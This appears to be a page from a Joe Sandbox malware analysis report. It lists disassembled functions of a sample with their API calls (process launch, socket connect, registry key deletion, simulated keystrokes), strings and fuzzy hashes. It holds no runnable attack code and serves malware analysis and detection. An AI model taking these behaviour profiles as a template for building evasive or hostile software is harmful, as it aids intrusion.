Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edf75428be625f4407db6890bd259e27af7efe6a4ba3867c6e1cd673e6165548
Instruction ID: e3d9f6bfb5472975c786c9e470101e9683c1c907b773f677ed137a2adfbdd243
Opcode Fuzzy Hash: edf75428be625f4407db6890bd259e27af7efe6a4ba3867c6e1cd673e6165548
Instruction Fuzzy Hash: D7715C74904109FFCB149F98CC89ABEBB79FF8A310F148159F915AB291C734AA51CFA4

Function 00B16E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8929b457da7bedd65614a6de39a125e9cb99ea9c30c953d161de771cadbabd6a
Instruction ID: 9551f148d962dea008baac8b5893651fc0455ad2110176d3f82b0833a787c5b4
Opcode Fuzzy Hash: 8929b457da7bedd65614a6de39a125e9cb99ea9c30c953d161de771cadbabd6a
Instruction Fuzzy Hash: 7961CA72508300ABC720EB20CD86EABB3E9EF89710F504A5DB5459B2E2DF709D41C792

Function 00B2B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01125920), ref: 00B2B6A5
IsWindowEnabled.USER32(01125920), ref: 00B2B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B2B795
SendMessageW.USER32(01125920,000000B0,?,?), ref: 00B2B7CC
IsDlgButtonChecked.USER32(?,?), ref: 00B2B809
GetWindowLongW.USER32(01125920,000000EC), ref: 00B2B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B2B843

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 784afd687b3ace6a86beaa6d784c0c9502be2a407a749d498296d30e4dc30e7c
Instruction ID: f256f94765be71225125d35d4e8c4c0bce76c93bcc9a5dac9190236f2e562f8b
Opcode Fuzzy Hash: 784afd687b3ace6a86beaa6d784c0c9502be2a407a749d498296d30e4dc30e7c
Instruction Fuzzy Hash: 1A718B34600225AFDB219F64E894FBABBF9FF89300F1444E9E949972A1CF35AC41DB50

Function 00B1F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B1F75C
_memset.LIBCMT ref: 00B1F825
ShellExecuteExW.SHELL32(?), ref: 00B1F86A

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

Part of subcall function 00ABFEC6: _wcscpy.LIBCMT ref: 00ABFEE9

GetProcessId.KERNEL32(00000000), ref: 00B1F8E1
CloseHandle.KERNEL32(00000000), ref: 00B1F910

Strings

@, xrefs: 00B1F839

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 28bfd0858d8d679dd3957d6e8f1e0fc6a442d911c6e7f6e030d494668b5d7785
Instruction ID: 72e1ab9171eb63384605c2a2845843455b8e7742344f2e0d5fab9b76e0f0ecf9
Opcode Fuzzy Hash: 28bfd0858d8d679dd3957d6e8f1e0fc6a442d911c6e7f6e030d494668b5d7785
Instruction Fuzzy Hash: B0619275A0061ADFCF14EF54C5819AEBBF5FF49310F1484A9E855AB3A1CB31AD41CB90

Function 00B0145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B0149C
GetKeyboardState.USER32(?), ref: 00B014B1
SetKeyboardState.USER32(?), ref: 00B01512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00B01540
PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00B015A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B015C8

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9dd33d80b35e5a3b98dcd152736e496a58a23dc1c0d38f5400a473ae048f4293
Instruction ID: 6df95b65f26b0f1867ddaf3f91ec3310aa3d009f1e2acc522e7390eef7aac6a3
Opcode Fuzzy Hash: 9dd33d80b35e5a3b98dcd152736e496a58a23dc1c0d38f5400a473ae048f4293
Instruction Fuzzy Hash: A551D4A06047D53EFB3A463C8C45BBA7EE9AB46304F0C49C9E1D65A8D2C7D5DC84D750

Function 00B01276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B012B5
GetKeyboardState.USER32(?), ref: 00B012CA
SetKeyboardState.USER32(?), ref: 00B0132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B01357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B01374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B013B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B013D9

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b4decc76eb9d5aa9803d1f99c31d0a2ecc9e57ccaff3f7d017e60c2a3fb5e39b
Instruction ID: 3edc90eebfa32917b137b9efaeaa4f4eb04b1917e9b0352edfd49323f2c19de5
Opcode Fuzzy Hash: b4decc76eb9d5aa9803d1f99c31d0a2ecc9e57ccaff3f7d017e60c2a3fb5e39b
Instruction Fuzzy Hash: 3851F4A09047D53EFB3A87288C55B7ABFE9EB06300F088DC9E1D4568D2D794EC94D764

Function 00B0589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B058AC
_wcsncpy.LIBCMT ref: 00B058E1
_wcsncpy.LIBCMT ref: 00B05913
_wcsncpy.LIBCMT ref: 00B05946
_wcsncpy.LIBCMT ref: 00B05988
_wcsncpy.LIBCMT ref: 00B059C2
_wcsncpy.LIBCMT ref: 00B059F1

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 0a6faa25902aae751a6e653f3604cb9a27dc0db3592c988720577f1e968065e2
Instruction ID: adf05ade19293712642031bd5eef1c537a236493ae6724fe852754a1d7b7c54d
Opcode Fuzzy Hash: 0a6faa25902aae751a6e653f3604cb9a27dc0db3592c988720577f1e968065e2
Instruction Fuzzy Hash: CB41A16AC2061876CF20EBB48986FCFB7AC9F04310F51856AF518E3161E634E715C7A9

Function 00B038AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B048AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B038D3,?), ref: 00B048C7

Part of subcall function 00B048AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B038D3,?), ref: 00B048E0

lstrcmpiW.KERNEL32(?,?), ref: 00B038F3
_wcscmp.LIBCMT ref: 00B0390F
MoveFileW.KERNEL32(?,?), ref: 00B03927
_wcscat.LIBCMT ref: 00B0396F
SHFileOperationW.SHELL32(?), ref: 00B039DB

Strings

\*.*, xrefs: 00B03969

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 1c8e531a02037d04002d9e094c5a491122deddbddaf6fe37866c6789ba9414a1
Instruction ID: 87a2e802d002953e8d5caa00f65ca8b4fa23dedfad6711723d51d9016f229cc2
Opcode Fuzzy Hash: 1c8e531a02037d04002d9e094c5a491122deddbddaf6fe37866c6789ba9414a1
Instruction Fuzzy Hash: 104173B15083849ED761EF64C485AEFBBECEF89740F44096EB48AC3191EB74D688C752

Function 00B27500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B27519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B275C0
IsMenu.USER32(?), ref: 00B275D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B27620
DrawMenuBar.USER32 ref: 00B27633

Strings

0, xrefs: 00B2750D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: d09f1539a53d7945728a757eb03a3ef3f4632598dbf3268146b683fb12a15f1d
Instruction ID: 159e86be4c91f662d99d780de64232529ffd4edde7c4322c563cee24c7025fc8
Opcode Fuzzy Hash: d09f1539a53d7945728a757eb03a3ef3f4632598dbf3268146b683fb12a15f1d
Instruction Fuzzy Hash: 0F415B75A04619EFDB21DF55E884EAABBF8FF08310F048069F91997290DB30AD50CF91

Function 00B2122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B2125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B21286
FreeLibrary.KERNEL32(00000000), ref: 00B2133D

Part of subcall function 00B2122D: RegCloseKey.ADVAPI32(?), ref: 00B212A3
Part of subcall function 00B2122D: FreeLibrary.KERNEL32(?), ref: 00B212F5
Part of subcall function 00B2122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B21318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B212E0

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 1859621d005c89f3c55c0acad5ddaa86eac5898da4b22e5f1aa6185a01bd1baf
Instruction ID: b38856ed8d4f29fcb3dad1c47654bb5581cc940e4ffde91f4f7d16cf4cf52e2d
Opcode Fuzzy Hash: 1859621d005c89f3c55c0acad5ddaa86eac5898da4b22e5f1aa6185a01bd1baf
Instruction Fuzzy Hash: 673119B1901119BFDB14DF94EC89EFFB7BCEB18300F1005BAE505E3151EA749E4A9AA4

Function 00B2653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B2655B
GetWindowLongW.USER32(01125920,000000F0), ref: 00B2658E
GetWindowLongW.USER32(01125920,000000F0), ref: 00B265C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B265F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B2661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00B26630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B2664A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 801ed23e966afbdb8991e15f9a532766deb4b42335aba30a7b40dd600541bfc5
Instruction ID: d9604ac735414051ca520bd1d6a9b73be778f897b6fc5ad8fe31e04fcdec740e
Opcode Fuzzy Hash: 801ed23e966afbdb8991e15f9a532766deb4b42335aba30a7b40dd600541bfc5
Instruction Fuzzy Hash: 49311330604265AFDB21CF28EC84FA53BE5FB5A710F1801A9F509CB2B5CB71AC40DB81

Function 00B16486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B180A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B180CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B164D9
WSAGetLastError.WSOCK32(00000000), ref: 00B164E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B16521
connect.WSOCK32(00000000,?,00000010), ref: 00B1652A
WSAGetLastError.WSOCK32 ref: 00B16534
closesocket.WSOCK32(00000000), ref: 00B1655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B16576

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: d6182cc0b60405e9244f07753db98b145a401977e39411f461bac0247d6fcb51
Instruction ID: 77bd767feb5d37866e8c263c35ade5dd864145cb2763eddcfd1af897cd3af90f
Opcode Fuzzy Hash: d6182cc0b60405e9244f07753db98b145a401977e39411f461bac0247d6fcb51
Instruction Fuzzy Hash: 1A31A171600118AFDB10AF24CC85BBE7BF9EB45760F4040A9F9059B291DB70AD45CB61

Function 00AFE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE120
SysAllocString.OLEAUT32(00000000), ref: 00AFE123
SysAllocString.OLEAUT32 ref: 00AFE144
SysFreeString.OLEAUT32 ref: 00AFE14D
StringFromGUID2.OLE32(?,?,00000028), ref: 00AFE167
SysAllocString.OLEAUT32(?), ref: 00AFE175

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 39ede024f90d19a847f660afee309bcc4561f7263d518574a6f8488c5729ea7c
Instruction ID: 8ecb19d169d613bd77ac64fb8722c695c8b68582ac085757182c21a181c99479
Opcode Fuzzy Hash: 39ede024f90d19a847f660afee309bcc4561f7263d518574a6f8488c5729ea7c
Instruction Fuzzy Hash: 3421513560410DAF9B20EFA9DC89DBB77ACEB19760B508235FA15CB260DA749C418B64

Function 00B2783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B278A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B278AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B278B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B278C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B278D4

Strings

Msctls_Progress32, xrefs: 00B27872

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: ab792a82d4d28efa1a489b04a9a0c5473eaacd37edddb27f2bf89146f93990e9
Instruction ID: 9943329e64ca1bda2bd3ddec254f0a7e14cd826402e587973aa09cf8c0ee42dc
Opcode Fuzzy Hash: ab792a82d4d28efa1a489b04a9a0c5473eaacd37edddb27f2bf89146f93990e9
Instruction Fuzzy Hash: 981182B255022ABFEF159F61DC85EE77F6DEF08758F014115FA08A60A0CB729C21DBA4

Function 00AC41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AC4292,?), ref: 00AC41E3
GetProcAddress.KERNEL32(00000000), ref: 00AC41EA
EncodePointer.KERNEL32(00000000), ref: 00AC41F6
DecodePointer.KERNEL32(00000001,00AC4292,?), ref: 00AC4213

Strings

RoInitialize, xrefs: 00AC41D2
combase.dll, xrefs: 00AC41DE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 7be6a33d4d5abfb80d768d6eb6cff2717bdac9a42e2a1753a85e1ff30e4ca6cf
Instruction ID: b2362ecf212fbdf514af75e5e30fb9673a29bed8b6d8c7068548df2dd0244735
Opcode Fuzzy Hash: 7be6a33d4d5abfb80d768d6eb6cff2717bdac9a42e2a1753a85e1ff30e4ca6cf
Instruction Fuzzy Hash: C9E0E5B0691701ABEB209BB0EC09B643EA4AB2AB02F505438F411E70E0DFF940968F08

